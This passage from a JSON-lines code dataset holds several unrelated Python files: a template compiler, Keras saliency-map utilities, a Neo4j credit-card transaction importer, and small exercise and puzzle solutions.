self.block.endswith(\":\"):\n self.offset += 1\n self.block = \"\"\n\n def processVariable(self):\n self.block = self.block.strip()\n self.block = \"\\t\" * self.offset + f\"write({self.block})\"\n self.blocks.append(self.block)\n self.block = \"\"\n\n def compile(self):\n state = self.State.TEXT\n\n # Process template source\n while self.cursor < len(self.source):\n # Process plain text till first token occurance\n if state == self.State.TEXT:\n if self.source[self.cursor :].startswith(\"{%\"):\n state = self.State.CONTROL\n self.cursor += 1\n elif self.source[self.cursor :].startswith(\"{{\"):\n state = self.State.VARIABLE\n self.cursor += 1\n else:\n self.block += self.source[self.cursor]\n # Commit self.block if token was found\n if state != self.State.TEXT:\n self.processText()\n elif state == self.State.CONTROL:\n if self.source[self.cursor :].startswith(\"%}\"):\n self.cursor += 1\n state = self.State.TEXT\n self.processControl()\n else:\n self.block += self.source[self.cursor]\n elif state == self.State.VARIABLE:\n if self.source[self.cursor :].startswith(\"}}\"):\n self.cursor += 1\n state = self.State.TEXT\n self.processVariable()\n else:\n self.block += self.source[self.cursor]\n else:\n raise Exception(\"Unknown State\")\n\n self.cursor += 1\n\n if state != self.State.TEXT:\n raise Exception(\"Last self.block was not closed\")\n\n if self.block:\n self.processText()\n\n return \"\\n\".join(self.blocks)\n\n\nclass Templite:\n cache = {}\n\n def __init__(self, text=None, filename=None, encoding=\"utf-8\", caching=False):\n \"\"\"Loads a template from string or file.\"\"\"\n if filename:\n filename = os.path.abspath(filename)\n mtime = os.path.getmtime(filename)\n self.file = key = filename\n elif text is not None:\n self.file = mtime = None\n key = hash(text)\n else:\n raise ValueError(\"either text or filename required\")\n # set attributes\n self.encoding = encoding\n self.caching = caching\n # check cache\n cache = self.cache\n if caching and key in cache and cache[key][0] == mtime:\n self._code = cache[key][1]\n return\n # read file\n if filename:\n with open(filename) as fh:\n text = fh.read()\n # Compile template to executable\n code = TempliteCompiler(text, self.encoding).compile()\n self._code = compile(code, self.file or \"<string>\", \"exec\")\n # Cache for future use\n if caching:\n cache[key] = (mtime, self._code)\n\n def render(self, **namespace):\n \"\"\"Renders the template according to the given namespace.\"\"\"\n stack = []\n namespace[\"__file__\"] = self.file\n\n # add write method\n def write(*args):\n for value in args:\n stack.append(str(value))\n\n namespace[\"write\"] = write\n\n # add include method\n def include(file):\n if not os.path.isabs(file):\n if self.file:\n base = os.path.dirname(self.file)\n else:\n base = os.path.dirname(sys.argv[0])\n file = os.path.join(base, file)\n t = Templite(None, file, self.encoding, self.delimiters, self.caching)\n stack.append(t.render(**namespace))\n\n namespace[\"include\"] = include\n # execute template code\n exec(self._code, namespace)\n return \"\".join(stack)\n","repo_name":"DarkFlippers/unleashed-firmware","sub_path":"scripts/flipper/utils/templite.py","file_name":"templite.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":12119,"dataset":"github-code","pt":"22"} +{"seq_id":"72348213496","text":"\"\"\"Methods for creating saliency maps.\"\"\"\n\nimport pickle\nimport numpy\nfrom keras import backend as K\nfrom gewittergefahr.gg_utils import file_system_utils\nfrom gewittergefahr.gg_utils import error_checking\nfrom gewittergefahr.deep_learning import model_interpretation\n\nTOLERANCE = 1e-6\nDEFAULT_IDEAL_ACTIVATION = 2.\n\nPREDICTOR_MATRICES_KEY = model_interpretation.PREDICTOR_MATRICES_KEY\nSALIENCY_MATRICES_KEY = 'saliency_matrices'\nMODEL_FILE_KEY = model_interpretation.MODEL_FILE_KEY\nFULL_STORM_IDS_KEY = model_interpretation.FULL_STORM_IDS_KEY\nSTORM_TIMES_KEY = model_interpretation.STORM_TIMES_KEY\nCOMPONENT_TYPE_KEY = 'component_type_string'\nTARGET_CLASS_KEY = 'target_class'\nLAYER_NAME_KEY = 'layer_name'\nIDEAL_ACTIVATION_KEY = 'ideal_activation'\nNEURON_INDICES_KEY = 'neuron_indices'\nCHANNEL_INDEX_KEY = 'channel_index'\nSOUNDING_PRESSURES_KEY = model_interpretation.SOUNDING_PRESSURES_KEY\n\nSTANDARD_FILE_KEYS = [\n PREDICTOR_MATRICES_KEY, SALIENCY_MATRICES_KEY,\n FULL_STORM_IDS_KEY, STORM_TIMES_KEY, MODEL_FILE_KEY,\n COMPONENT_TYPE_KEY, TARGET_CLASS_KEY, LAYER_NAME_KEY, IDEAL_ACTIVATION_KEY,\n NEURON_INDICES_KEY, CHANNEL_INDEX_KEY,\n SOUNDING_PRESSURES_KEY\n]\n\nMEAN_PREDICTOR_MATRICES_KEY = model_interpretation.MEAN_PREDICTOR_MATRICES_KEY\nMEAN_SALIENCY_MATRICES_KEY = 'mean_saliency_matrices'\nNON_PMM_FILE_KEY = model_interpretation.NON_PMM_FILE_KEY\nPMM_MAX_PERCENTILE_KEY = model_interpretation.PMM_MAX_PERCENTILE_KEY\nMEAN_SOUNDING_PRESSURES_KEY = model_interpretation.MEAN_SOUNDING_PRESSURES_KEY\n\nPMM_FILE_KEYS = [\n MEAN_PREDICTOR_MATRICES_KEY, MEAN_SALIENCY_MATRICES_KEY, MODEL_FILE_KEY,\n NON_PMM_FILE_KEY, PMM_MAX_PERCENTILE_KEY, MEAN_SOUNDING_PRESSURES_KEY\n]\n\n\ndef _check_in_and_out_matrices(\n predictor_matrices, num_examples=None, saliency_matrices=None):\n \"\"\"Error-checks input and output matrices.\n\n T = number of input tensors to the model\n E = number of examples (storm objects)\n\n :param predictor_matrices: length-T list of predictor matrices. Each item\n must be a numpy array.\n :param num_examples: E in the above discussion. The first axis of each\n array must have length E. If you don't know the number of examples,\n leave this as None.\n :param saliency_matrices: Same as `predictor_matrices` but with saliency\n values.\n :raises: ValueError: if `predictor_matrices` and `saliency_matrices` have\n different lengths.\n \"\"\"\n\n error_checking.assert_is_list(predictor_matrices)\n num_matrices = len(predictor_matrices)\n\n if saliency_matrices is None:\n saliency_matrices = [None] * num_matrices\n\n error_checking.assert_is_list(saliency_matrices)\n num_saliency_matrices = len(saliency_matrices)\n\n if num_matrices != num_saliency_matrices:\n error_string = (\n 'Number of predictor matrices ({0:d}) should = number of saliency '\n 'matrices ({1:d}).'\n ).format(num_matrices, num_saliency_matrices)\n\n raise ValueError(error_string)\n\n for i in range(num_matrices):\n error_checking.assert_is_numpy_array_without_nan(predictor_matrices[i])\n\n if num_examples is not None:\n these_expected_dim = numpy.array(\n (num_examples,) + predictor_matrices[i].shape[1:], dtype=int\n )\n error_checking.assert_is_numpy_array(\n predictor_matrices[i], exact_dimensions=these_expected_dim\n )\n\n if saliency_matrices[i] is not None:\n error_checking.assert_is_numpy_array_without_nan(\n saliency_matrices[i]\n )\n\n these_expected_dim = numpy.array(\n predictor_matrices[i].shape, dtype=int\n )\n error_checking.assert_is_numpy_array(\n saliency_matrices[i], exact_dimensions=these_expected_dim\n )\n\n\ndef check_metadata(\n component_type_string, target_class=None, layer_name=None,\n ideal_activation=None, neuron_indices=None, channel_index=None):\n \"\"\"Error-checks metadata for saliency calculations.\n\n :param component_type_string: Component type (must be accepted by\n `model_interpretation.check_component_type`).\n :param target_class: See doc for `get_saliency_maps_for_class_activation`.\n :param layer_name: See doc for `get_saliency_maps_for_neuron_activation` or\n `get_saliency_maps_for_channel_activation`.\n :param ideal_activation: Same.\n :param neuron_indices: See doc for\n `get_saliency_maps_for_neuron_activation`.\n :param channel_index: See doc for `get_saliency_maps_for_class_activation`.\n\n :return: metadata_dict: Dictionary with the following keys.\n metadata_dict['component_type_string']: See input doc.\n metadata_dict['target_class']: Same.\n metadata_dict['layer_name']: Same.\n metadata_dict['ideal_activation']: Same.\n metadata_dict['neuron_indices']: Same.\n metadata_dict['channel_index']: Same.\n \"\"\"\n\n model_interpretation.check_component_type(component_type_string)\n\n if (component_type_string ==\n model_interpretation.CLASS_COMPONENT_TYPE_STRING):\n error_checking.assert_is_integer(target_class)\n error_checking.assert_is_geq(target_class, 0)\n\n if component_type_string in [\n model_interpretation.NEURON_COMPONENT_TYPE_STRING,\n model_interpretation.CHANNEL_COMPONENT_TYPE_STRING\n ]:\n error_checking.assert_is_string(layer_name)\n if ideal_activation is not None:\n error_checking.assert_is_greater(ideal_activation, 0.)\n\n if (component_type_string ==\n model_interpretation.NEURON_COMPONENT_TYPE_STRING):\n error_checking.assert_is_integer_numpy_array(neuron_indices)\n error_checking.assert_is_geq_numpy_array(neuron_indices, 0)\n error_checking.assert_is_numpy_array(neuron_indices, num_dimensions=1)\n\n if (component_type_string ==\n model_interpretation.CHANNEL_COMPONENT_TYPE_STRING):\n error_checking.assert_is_integer(channel_index)\n error_checking.assert_is_geq(channel_index, 0)\n\n return {\n COMPONENT_TYPE_KEY: component_type_string,\n TARGET_CLASS_KEY: target_class,\n LAYER_NAME_KEY: layer_name,\n IDEAL_ACTIVATION_KEY: ideal_activation,\n NEURON_INDICES_KEY: neuron_indices,\n CHANNEL_INDEX_KEY: channel_index\n }\n\n\ndef do_saliency_calculations(\n model_object, loss_tensor, list_of_input_matrices):\n \"\"\"Does saliency calculations.\n\n T = number of input tensors to the model\n E = number of examples (storm objects)\n\n :param model_object: Instance of `keras.models.Model`.\n :param loss_tensor: Keras tensor defining the loss function.\n :param list_of_input_matrices: length-T list of numpy arrays, comprising one\n or more examples (storm objects). list_of_input_matrices[i] must have\n the same dimensions as the [i]th input tensor to the model.\n :return: list_of_saliency_matrices: length-T list of numpy arrays,\n comprising the saliency map for each example.\n list_of_saliency_matrices[i] has the same dimensions as\n list_of_input_matrices[i] and defines the \"saliency\" of each value x,\n which is the gradient of the loss function with respect to x.\n \"\"\"\n\n if isinstance(model_object.input, list):\n list_of_input_tensors = model_object.input\n else:\n list_of_input_tensors = [model_object.input]\n\n list_of_gradient_tensors = K.gradients(loss_tensor, list_of_input_tensors)\n num_input_tensors = len(list_of_input_tensors)\n\n for i in range(num_input_tensors):\n list_of_gradient_tensors[i] /= K.maximum(\n K.std(list_of_gradient_tensors[i]), K.epsilon()\n )\n\n inputs_to_gradients_function = K.function(\n list_of_input_tensors + [K.learning_phase()], list_of_gradient_tensors\n )\n\n # list_of_saliency_matrices = None\n # num_examples = list_of_input_matrices[0].shape[0]\n #\n # for i in range(num_examples):\n # these_input_matrices = [a[[i], ...] for a in list_of_input_matrices]\n # these_saliency_matrices = inputs_to_gradients_function(\n # these_input_matrices + [0])\n #\n # if list_of_saliency_matrices is None:\n # list_of_saliency_matrices = these_saliency_matrices + []\n # else:\n # for i in range(num_input_tensors):\n # list_of_saliency_matrices[i] = numpy.concatenate(\n # (list_of_saliency_matrices[i], these_saliency_matrices[i]),\n # axis=0)\n\n list_of_saliency_matrices = inputs_to_gradients_function(\n list_of_input_matrices + [0]\n )\n\n for i in range(num_input_tensors):\n list_of_saliency_matrices[i] *= -1\n\n return list_of_saliency_matrices\n\n\ndef get_saliency_maps_for_class_activation(\n model_object, target_class, list_of_input_matrices):\n \"\"\"For each input example, creates saliency map for prob of target class.\n\n :param model_object: Instance of `keras.models.Model`.\n :param target_class: Saliency maps will be created for this class. Must be\n an integer in 0...(K - 1), where K = number of classes.\n :param list_of_input_matrices: See doc for `do_saliency_calculations`.\n :return: list_of_saliency_matrices: See doc for `do_saliency_calculations`.\n \"\"\"\n\n check_metadata(\n component_type_string=model_interpretation.CLASS_COMPONENT_TYPE_STRING,\n target_class=target_class)\n\n num_output_neurons = model_object.layers[-1].output.get_shape().as_list()[\n -1]\n\n if num_output_neurons == 1:\n error_checking.assert_is_leq(target_class, 1)\n if target_class == 1:\n loss_tensor = K.mean(\n (model_object.layers[-1].output[..., 0] - 1) ** 2\n )\n else:\n loss_tensor = K.mean(model_object.layers[-1].output[..., 0] ** 2)\n else:\n error_checking.assert_is_less_than(target_class, num_output_neurons)\n loss_tensor = K.mean(\n (model_object.layers[-1].output[..., target_class] - 1) ** 2\n )\n\n return do_saliency_calculations(\n model_object=model_object, loss_tensor=loss_tensor,\n list_of_input_matrices=list_of_input_matrices)\n\n\ndef get_saliency_maps_for_neuron_activation(\n model_object, layer_name, neuron_indices, list_of_input_matrices,\n ideal_activation=DEFAULT_IDEAL_ACTIVATION):\n \"\"\"For each input example, creates saliency map for activatn of one neuron.\n\n :param model_object: Instance of `keras.models.Model`.\n :param layer_name: Name of layer containing the relevant neuron.\n :param neuron_indices: 1-D numpy array with indices of the relevant neuron.\n Must have length K - 1, where K = number of dimensions in layer output.\n The first dimension of the layer output is the example dimension, for\n which the index in this case is always 0.\n :param list_of_input_matrices: See doc for `do_saliency_calculations`.\n :param ideal_activation: The loss function will be\n (neuron_activation - ideal_activation)** 2. If\n `ideal_activation is None`, the loss function will be\n -sign(neuron_activation) * neuron_activation**2, or the negative signed\n square of neuron_activation, so that loss always decreases as\n neuron_activation increases.\n :return: list_of_saliency_matrices: See doc for `do_saliency_calculations`.\n \"\"\"\n\n check_metadata(\n component_type_string=model_interpretation.NEURON_COMPONENT_TYPE_STRING,\n layer_name=layer_name, ideal_activation=ideal_activation,\n neuron_indices=neuron_indices)\n\n if ideal_activation is None:\n loss_tensor = (\n -K.sign(\n model_object.get_layer(name=layer_name).output[\n 0, ..., neuron_indices\n ]\n )\n * model_object.get_layer(name=layer_name).output[\n 0, ..., neuron_indices\n ] ** 2\n )\n else:\n loss_tensor = (\n model_object.get_layer(name=layer_name).output[\n 0, ..., neuron_indices\n ]\n - ideal_activation\n ) ** 2\n\n return do_saliency_calculations(\n model_object=model_object, loss_tensor=loss_tensor,\n list_of_input_matrices=list_of_input_matrices)\n\n\ndef get_saliency_maps_for_channel_activation(\n model_object, layer_name, channel_index, list_of_input_matrices,\n stat_function_for_neuron_activations,\n ideal_activation=DEFAULT_IDEAL_ACTIVATION):\n \"\"\"For each input example, creates saliency map for activatn of one channel.\n\n :param model_object: Instance of `keras.models.Model`.\n :param layer_name: Name of layer containing the relevant channel.\n :param channel_index: Index of the relevant channel. This method creates\n saliency maps for the [j]th output channel of `layer_name`, where\n j = `channel_index`.\n :param list_of_input_matrices: See doc for `do_saliency_calculations`.\n :param stat_function_for_neuron_activations: Function used to process neuron\n activations. In general, a channel contains many neurons, so there is\n an infinite number of ways to maximize the \"channel activation,\" because\n there is an infinite number of ways to define \"channel activation\".\n This function must take a Keras tensor (containing neuron activations)\n and return a single number. Some examples are `keras.backend.max` and\n `keras.backend.mean`.\n :param ideal_activation: See doc for\n `get_saliency_maps_for_neuron_activation`.\n :return: list_of_saliency_matrices: See doc for `do_saliency_calculations`.\n \"\"\"\n\n check_metadata(\n component_type_string=\n model_interpretation.CHANNEL_COMPONENT_TYPE_STRING,\n layer_name=layer_name, ideal_activation=ideal_activation,\n channel_index=channel_index\n )\n\n if ideal_activation is None:\n loss_tensor = -K.abs(stat_function_for_neuron_activations(\n model_object.get_layer(name=layer_name).output[\n 0, ..., channel_index\n ]\n ))\n else:\n error_checking.assert_is_greater(ideal_activation, 0.)\n loss_tensor = K.abs(\n stat_function_for_neuron_activations(\n model_object.get_layer(name=layer_name).output[\n 0, ..., channel_index]\n )\n - ideal_activation\n )\n\n return do_saliency_calculations(\n model_object=model_object, loss_tensor=loss_tensor,\n list_of_input_matrices=list_of_input_matrices)\n\n\ndef write_standard_file(\n pickle_file_name, denorm_predictor_matrices, saliency_matrices,\n full_storm_id_strings, storm_times_unix_sec, model_file_name,\n metadata_dict, sounding_pressure_matrix_pa=None):\n \"\"\"Writes saliency maps (one per storm object) to Pickle file.\n\n E = number of examples (storm objects)\n H = number of sounding heights\n\n :param pickle_file_name: Path to output file.\n :param denorm_predictor_matrices: See doc for `_check_in_and_out_matrices`.\n :param saliency_matrices: Same.\n :param full_storm_id_strings: length-E list of storm IDs.\n :param storm_times_unix_sec: length-E numpy array of storm times.\n :param model_file_name: Path to model that created saliency maps (readable\n by `cnn.read_model`).\n :param metadata_dict: Dictionary created by `check_metadata`.\n :param sounding_pressure_matrix_pa: E-by-H numpy array of pressure\n levels. Needed only if the model is trained with soundings but without\n pressure as a predictor.\n \"\"\"\n\n error_checking.assert_is_string(model_file_name)\n error_checking.assert_is_string_list(full_storm_id_strings)\n error_checking.assert_is_numpy_array(\n numpy.array(full_storm_id_strings), num_dimensions=1\n )\n\n num_examples = len(full_storm_id_strings)\n these_expected_dim = numpy.array([num_examples], dtype=int)\n\n error_checking.assert_is_integer_numpy_array(storm_times_unix_sec)\n error_checking.assert_is_numpy_array(\n storm_times_unix_sec, exact_dimensions=these_expected_dim)\n\n _check_in_and_out_matrices(\n predictor_matrices=denorm_predictor_matrices, num_examples=num_examples,\n saliency_matrices=saliency_matrices)\n\n if sounding_pressure_matrix_pa is not None:\n error_checking.assert_is_numpy_array_without_nan(\n sounding_pressure_matrix_pa)\n error_checking.assert_is_greater_numpy_array(\n sounding_pressure_matrix_pa, 0.)\n error_checking.assert_is_numpy_array(\n sounding_pressure_matrix_pa, num_dimensions=2)\n\n these_expected_dim = numpy.array(\n (num_examples,) + sounding_pressure_matrix_pa.shape[1:],\n dtype=int\n )\n error_checking.assert_is_numpy_array(\n sounding_pressure_matrix_pa, exact_dimensions=these_expected_dim)\n\n saliency_dict = {\n PREDICTOR_MATRICES_KEY: denorm_predictor_matrices,\n SALIENCY_MATRICES_KEY: saliency_matrices,\n FULL_STORM_IDS_KEY: full_storm_id_strings,\n STORM_TIMES_KEY: storm_times_unix_sec,\n MODEL_FILE_KEY: model_file_name,\n COMPONENT_TYPE_KEY: metadata_dict[COMPONENT_TYPE_KEY],\n TARGET_CLASS_KEY: metadata_dict[TARGET_CLASS_KEY],\n LAYER_NAME_KEY: metadata_dict[LAYER_NAME_KEY],\n IDEAL_ACTIVATION_KEY: metadata_dict[IDEAL_ACTIVATION_KEY],\n NEURON_INDICES_KEY: metadata_dict[NEURON_INDICES_KEY],\n CHANNEL_INDEX_KEY: metadata_dict[CHANNEL_INDEX_KEY],\n SOUNDING_PRESSURES_KEY: sounding_pressure_matrix_pa\n }\n\n file_system_utils.mkdir_recursive_if_necessary(file_name=pickle_file_name)\n pickle_file_handle = open(pickle_file_name, 'wb')\n pickle.dump(saliency_dict, pickle_file_handle)\n pickle_file_handle.close()\n\n\ndef write_pmm_file(\n pickle_file_name, mean_denorm_predictor_matrices,\n mean_saliency_matrices, model_file_name, non_pmm_file_name,\n pmm_max_percentile_level, mean_sounding_pressures_pa=None):\n \"\"\"Writes composite saliency map to Pickle file.\n\n The composite should be created by probability-matched means (PMM).\n\n H = number of sounding heights\n\n :param pickle_file_name: Path to output file.\n :param mean_denorm_predictor_matrices: See doc for\n `_check_in_and_out_matrices`.\n :param mean_saliency_matrices: Same.\n :param model_file_name: Path to model that created saliency maps (readable\n by `cnn.read_model`).\n :param non_pmm_file_name: Path to standard saliency file (containing\n non-composited saliency maps).\n :param pmm_max_percentile_level: Max percentile level for PMM.\n :param mean_sounding_pressures_pa: length-H numpy array of PMM-composited\n sounding pressures. Needed only if the model is trained with soundings\n but without pressure as a predictor.\n \"\"\"\n\n error_checking.assert_is_string(model_file_name)\n error_checking.assert_is_string(non_pmm_file_name)\n error_checking.assert_is_geq(pmm_max_percentile_level, 90.)\n error_checking.assert_is_leq(pmm_max_percentile_level, 100.)\n\n _check_in_and_out_matrices(\n predictor_matrices=mean_denorm_predictor_matrices, num_examples=None,\n saliency_matrices=mean_saliency_matrices)\n\n if mean_sounding_pressures_pa is not None:\n num_heights = mean_denorm_predictor_matrices[-1].shape[-2]\n these_expected_dim = numpy.array([num_heights], dtype=int)\n\n error_checking.assert_is_geq_numpy_array(mean_sounding_pressures_pa, 0.)\n error_checking.assert_is_numpy_array(\n mean_sounding_pressures_pa, exact_dimensions=these_expected_dim)\n\n mean_saliency_dict = {\n MEAN_PREDICTOR_MATRICES_KEY: mean_denorm_predictor_matrices,\n MEAN_SALIENCY_MATRICES_KEY: mean_saliency_matrices,\n MODEL_FILE_KEY: model_file_name,\n NON_PMM_FILE_KEY: non_pmm_file_name,\n PMM_MAX_PERCENTILE_KEY: pmm_max_percentile_level,\n MEAN_SOUNDING_PRESSURES_KEY: mean_sounding_pressures_pa\n }\n\n file_system_utils.mkdir_recursive_if_necessary(file_name=pickle_file_name)\n pickle_file_handle = open(pickle_file_name, 'wb')\n pickle.dump(mean_saliency_dict, pickle_file_handle)\n pickle_file_handle.close()\n\n\ndef read_file(pickle_file_name):\n \"\"\"Reads composite or non-composite saliency maps from Pickle file.\n\n :param pickle_file_name: Path to input file (created by\n `write_standard_file` or `write_pmm_file`).\n :return: saliency_dict: Has the following keys if not a composite...\n saliency_dict['denorm_predictor_matrices']: See doc for\n `write_standard_file`.\n saliency_dict['saliency_matrices']: Same.\n saliency_dict['full_storm_id_strings']: Same.\n saliency_dict['storm_times_unix_sec']: Same.\n saliency_dict['model_file_name']: Same.\n saliency_dict['component_type_string']: Same.\n saliency_dict['target_class']: Same.\n saliency_dict['layer_name']: Same.\n saliency_dict['ideal_activation']: Same.\n saliency_dict['neuron_indices']: Same.\n saliency_dict['channel_index']: Same.\n saliency_dict['sounding_pressure_matrix_pa']: Same.\n\n ...or the following keys if composite...\n\n saliency_dict['mean_denorm_predictor_matrices']: See doc for\n `write_pmm_file`.\n saliency_dict['mean_saliency_matrices']: Same.\n saliency_dict['model_file_name']: Same.\n saliency_dict['non_pmm_file_name']: Same.\n saliency_dict['pmm_max_percentile_level']: Same.\n saliency_dict['mean_sounding_pressures_pa']: Same.\n\n :return: pmm_flag: Boolean flag. True if `saliency_dict` contains\n composite, False otherwise.\n\n :raises: ValueError: if dictionary does not contain expected keys.\n \"\"\"\n\n pickle_file_handle = open(pickle_file_name, 'rb')\n saliency_dict = pickle.load(pickle_file_handle)\n pickle_file_handle.close()\n\n pmm_flag = MEAN_PREDICTOR_MATRICES_KEY in saliency_dict\n\n if pmm_flag:\n missing_keys = list(\n set(PMM_FILE_KEYS) - set(saliency_dict.keys())\n )\n else:\n missing_keys = list(\n set(STANDARD_FILE_KEYS) - set(saliency_dict.keys())\n )\n\n if len(missing_keys) == 0:\n return saliency_dict, pmm_flag\n\n error_string = (\n '\\n{0:s}\\nKeys listed above were expected, but not found, in file '\n '\"{1:s}\".'\n ).format(str(missing_keys), pickle_file_name)\n\n raise ValueError(error_string)\n","repo_name":"thunderhoser/GewitterGefahr","sub_path":"gewittergefahr/deep_learning/saliency_maps.py","file_name":"saliency_maps.py","file_ext":"py","file_size_in_byte":22461,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"22"} +{"seq_id":"21380706913","text":"import pandas as pd\nimport time\nimport threading\nfrom queue import Queue\nimport math\nimport os.path\nimport sys\n\nfrom util.graphdb_base import GraphDBBase\n\nnum_threads = 5\n\nclass CreditCardTransactionImporter(GraphDBBase):\n\n def __init__(self, argv):\n super().__init__(command=__file__, argv=argv)\n self._transactions = Queue()\n self._dictionaries = {}\n self._print_lock = threading.Lock()\n with self._driver.session() as session:\n self.execute_without_exception(\"CREATE CONSTRAINT ON (s:Transaction) ASSERT s.transactionId IS UNIQUE\")\n self.execute_without_exception(\"CREATE INDEX ON :Transaction(isFraud)\")\n\n def import_transactions(self, directory):\n j = 0\n transactions = pd.read_csv(os.path.join(directory, \"creditcard.csv\"))\n # Starting threads for parallel writing\n for k in range(num_threads):\n print(\"starting thread: \", k)\n writing_thread = threading.Thread(target = self.write_transaction)\n writing_thread.daemon = True\n writing_thread.start()\n\n for index, row in transactions.iterrows():\n j += 1\n transaction = {\n 'transactionId': j,\n 'isFraud': row['Class'],\n 'transactionDt': row['Time'],\n 'transactionAmt': row['Amount']}\n vector = self.normalize(row, ['Time', 'Class'])\n transaction['vector'] = vector\n self._transactions.put(transaction)\n # ADD ROW\n if j % 10000 == 0:\n print(j, \"lines processed\")\n print(j, \"lines processed\")\n self._transactions.join()\n print(\"Done\")\n\n def normalize(self, row, exludes):\n vector = []\n for item in list(row.items()):\n if item[0] in exludes:\n continue\n if isinstance(item[1], str):\n vocab = {}\n if item[0] in self._dictionaries:\n vocab = self._dictionaries[item[0]]\n else:\n self._dictionaries[item[0]] = vocab\n\n if item[1] in vocab:\n vocab_index = vocab[item[1]]\n else:\n vocab_index = len(vocab) + 1\n vocab[item[1]] = vocab_index\n vector.append(float(vocab_index))\n self._dictionaries[item[0]] = vocab\n elif math.isnan(item[1]):\n vector.append(float(0))\n else:\n vector.append(float(item[1]))\n return vector\n\n def write_transaction(self):\n query = \"\"\"\n WITH $row as map\n CREATE (transaction:Transaction {transactionId: map.transactionId})\n SET transaction += map\n \"\"\"\n i = 0\n while True:\n row = self._transactions.get()\n with self._driver.session() as session:\n try:\n session.run(query, {\"row\": row})\n i += 1\n if i % 2000 == 0:\n with self._print_lock:\n print(i, \"lines processed on one thread\")\n except Exception as e:\n print(e, row)\n self._transactions.task_done()\n\n\nif __name__ == '__main__':\n importer = CreditCardTransactionImporter(sys.argv[1:])\n\n start = time.time()\n base_path = importer.source_dataset_path\n if not base_path:\n base_path = \"../../../dataset/creditcard\"\n\n importer.import_transactions(directory=base_path)\n print(\"Time to complete paysim ingestion:\", time.time() - start)\n\n # intermediate = time.time()\n # importer.post_processing(sess_clicks=sessions)\n # print(\"Time to complete post processing:\", time.time() - intermediate)\n\n print(\"Time to complete end-to-end:\", time.time() - start)\n\n importer.close()\n","repo_name":"alenegro81/gpml","sub_path":"ch09/import/creditcard/import_credit_card.py","file_name":"import_credit_card.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"22"} +{"seq_id":"13967029166","text":"'''40. Foi feita uma estatística em cinco cidades brasileiras para coletar dados sobre acidentes de trânsito. Foram obtidos os\nseguintes dados:\na. Código da cidade;\nb. Número de veículos de passeio (em 1999);\nc. Número de acidentes de trânsito com vítimas (em 1999). Deseja-se saber:\nd. Qual o maior e menor índice de acidentes de transito e a que cidade pertence;\ne. Qual a média de veículos nas cinco cidades juntas;\nf. Qual a média de acidentes de trânsito nas cidades com menos de 2.000 veículos de passeio.'''\n\ndef estatistica_cidades():\n cod = []\n num_veic = []\n num_acid = []\n\n while len(cod) < 5:\n cod.append(int(input('{}ª Cidade Codigo : '.format(len(cod)+1))))\n num_veic.append(int(input('{}ª Cidade Numero de Veiculos: '.format(len(num_veic)+1))))\n num_acid.append(int(input('{}ª Cidade Numero de Acidentes: '.format(len(num_acid)+1))))\n\n index_trans_min, index_trans_max = num_veic.index(min(num_veic)),num_veic.index(max(num_veic))\n media_veic = sum(num_veic) / len(num_veic)\n\n cid_menor_2mil = []\n for i in range(len(num_veic)):\n qtde = num_veic[i]\n if qtde < 2000:\n cid_menor_2mil.append(qtde)\n\n media_cid_menor_2mil = sum(cid_menor_2mil) / len(cid_menor_2mil)\n\n print('\\nO Maior índice de Acidente de carro é: {} e O codigo da Cidade é: {}'.format(num_acid[index_trans_max],cod[index_trans_max]))\n print('O Menor índice de Acidente de carro é: {} e O codigo da Cidade é: {}'.format(num_acid[index_trans_min],cod[index_trans_min]))\n print('A media de Veiculos nas cinco cidade é: {}'.format(media_veic))\n print('A Media de acidente de trasito nas cidades com Menos de 2mil habitantes é: {}'.format(media_cid_menor_2mil))\n print('\\n')\nestatistica_cidades()\n\n\n \n ","repo_name":"Edspx/ExerciciosPythonBrasil","sub_path":"3EstruturaDeRepeticao/3_40.py","file_name":"3_40.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28450225885","text":"import libRL\n\nfrom libRL.tools.f_peak import f_peak\nfrom libRL.tools.quarter_wave import power_fn, quarter_wave\n\nfrom .utils import Expectation\n\n\nclass TestFPeak:\n def test_f_peak(self, al_tio2_fixture):\n fn = f_peak(al_tio2_fixture.name, f_set=(1, 18, 0.1), d_set=(0, 5, 0.1))\n\n actual = {str(i): fn(i) for i in range(1, 5)}\n expected = Expectation(\"al_tio2_fpeak.json\")\n for av, ev in zip(actual.values(), expected.read().values()):\n assert av == ev\n\n def test_quarter_wave(self, al_tio2_fixture):\n fn = quarter_wave(al_tio2_fixture.name, f_set=(1, 18, 0.1),)\n assert len(fn.f) == len(fn(1))\n\n def test_power_fn(self, al_tio2_fixture):\n fn = power_fn(al_tio2_fixture.name, f_set=(1, 18, 0.1), d_set=(0.1, 5, 0.1))\n assert len(fn.d) == len(fn(1))\n","repo_name":"1mikegrn/libRL","sub_path":"test/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"35234841575","text":"\"\"\"Solution for day 6, part 1 puzzle on adventofcode.com\"\"\"\n\nwith open(file='input.txt',mode='rt',encoding='utf-8') as file:\n l = file.read().split('\\n\\n')\n customs_list = []\n for item in l:\n customs_list.append(item.replace('\\n',''))\n complete_set = []\n for item in customs_list:\n response_set = set()\n for response in item:\n response_set.add(response)\n complete_set.append(response_set)\n\ndef calculate_responses(input):\n total = 0\n for i in input:\n total += len(i)\n return total\n\nprint(calculate_responses(complete_set))","repo_name":"kenkitts/advent_of_code","sub_path":"day6/d6p1.py","file_name":"d6p1.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14115597953","text":"from typing import List\n\n\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n lo, hi = 0, len(nums)\n while lo != hi:\n mid = (lo + hi) // 2\n if target <= nums[mid]:\n hi = mid\n else:\n lo = mid + 1\n return lo\n\n\nif __name__ == '__main__':\n solution = Solution()\n nums = [1, 3, 5, 6]\n target = 5\n result = solution.searchInsert(nums, target)\n 